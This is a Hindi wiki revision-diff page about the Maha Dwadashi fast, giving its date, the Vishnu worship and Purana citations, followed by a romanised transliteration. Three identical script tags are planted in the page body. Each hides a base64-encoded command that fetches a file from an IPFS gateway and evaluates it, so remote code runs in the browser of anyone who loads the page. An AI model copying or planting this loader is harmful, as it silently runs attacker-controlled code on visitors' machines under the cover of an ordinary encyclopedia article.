Difference between revisions of "महा द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*[[श्रवण नक्षत्र]] से युक्त [[भाद्रपद]] [[शुक्ल]] की [[द्वादशी]] को यह संज्ञा मिली है।
+
*[[श्रवण नक्षत्र]] से युक्त [[भाद्रपद]] [[शुक्ल पक्ष|शुक्ल]] की [[द्वादशी]] को यह संज्ञा मिली है।
 
*इस व्रत में उपवास रखा जाता है।
 
*इस व्रत में उपवास रखा जाता है।
*भगवान [[विष्णु]] की पूजा की जाती है।<ref>कृत्यरत्नाकर (286-287)</ref>  
+
*भगवान [[विष्णु]] की पूजा की जाती है।<ref>कृत्यरत्नाकर (286-287</ref>  
*विष्णुधर्मोत्तरपुराण<ref>विष्णुधर्मोत्तरपुराण (1|161|1-8)</ref> में आया है कि यदि भाद्रपद द्वादशी [[बुधवार]] को पड़े और श्रवण नक्षत्र में हो तो अत्यन्त महन्ती (महान से महान) की संज्ञा प्राप्त होती है।  
+
*विष्णुधर्मोत्तरपुराण<ref>विष्णुधर्मोत्तरपुराण (1|161|1-8</ref> में आया है कि यदि भाद्रपद द्वादशी [[बुधवार]] को पड़े और श्रवण नक्षत्र में हो तो अत्यन्त महन्ती (महान से महान) की संज्ञा प्राप्त होती है।  
*विष्णुधर्मोत्तरपुराण<ref>विष्णुधर्मोत्तरपुराण (1|162|1-71)</ref> ने श्रवण द्वादशी के महात्म्य पर विस्तार से चर्चा की है।  
+
*विष्णुधर्मोत्तरपुराण<ref>विष्णुधर्मोत्तरपुराण (1|162|1-71</ref> ने श्रवण द्वादशी के महात्म्य पर विस्तार से चर्चा की है।  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:48, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shravan nakshatr se yukt bhadrapad shukl ki dvadashi ko yah sanjna mili hai.
  • is vrat mean upavas rakha jata hai.
  • bhagavan vishnu ki pooja ki jati hai.[1]
  • vishnudharmottarapuran[2] mean aya hai ki yadi bhadrapad dvadashi budhavar ko p de aur shravan nakshatr mean ho to atyant mahanti (mahan se mahan) ki sanjna prapt hoti hai.
  • vishnudharmottarapuran[3] ne shravan dvadashi ke mahatmy par vistar se charcha ki hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. krityaratnakar (286-287
  2. vishnudharmottarapuran (1|161|1-8
  3. vishnudharmottarapuran (1|162|1-71

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>